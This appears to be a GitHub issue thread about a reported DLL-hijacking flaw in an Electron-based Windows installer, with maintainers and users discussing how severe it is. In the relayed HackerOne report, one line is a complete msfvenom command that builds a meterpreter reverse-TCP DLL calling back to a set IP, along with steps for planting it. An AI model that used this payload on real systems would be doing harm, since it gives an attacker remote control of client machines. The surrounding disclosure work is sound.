DLL Hijacking In Windows Installer

[kspearrin]

• Version: ^20.25.0

• Target: --win --x64 --ia32

We received the following report for a security researcher on HackerOne about our application. I am not sure if it is valid, but here is what was reported:

I would like to report that the xxxxx-installer.exe is vulnerable to DLL highjacking on the following library:

C:\Windows\SYSTEM32\CRYPTSP.DLL

In order to recreate the issue, simply generate a malicious DLL using metasploit with the following command: "msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.123.12.3 LPORT=4444 -f DLL >CRYPTSP.DLL" and place the malicious DLL in the same folder as where the installation executable will be run from on the client machine.

This was tested on a fully patched Windows 7 professional client.

Impact RCE on the client computer

[Metnew]

Any updates on this? Seems quite serious

[tassoevan]

I've received a report suggesting that SECUR32.DLL could be exploited too.

[mceachen]

Seems quite serious

@kspearrin doesn't the patched DLL have to be copied on the user's machine, which means the host is already compromised, at least to some degree?

[jahidzaynal]

@kspearrin doesn't the patched DLL have to be copied on the user's machine, which means the host is already compromised, at least to some degree?

yes, but if I understand it correctly the attacker could potentially just copy a DLL into a folder on the machine that doesn't require privileged access, through the electron installer they will be able to get privileged access as soon as the malicious DLL gets run by electron. Hence electron causes the severity of the hijack to be escalated. Or for example they could put Remote Execution code in a DLL and wait until that DLL gets run by the user, giving attacker remote execution abilities.

[stale[bot]]

This issue has been automatically marked as stale because it has not had recent activity. It will be closed if no further activity occurs. Thank you for your contributions.

[kspearrin]

Still an open issue.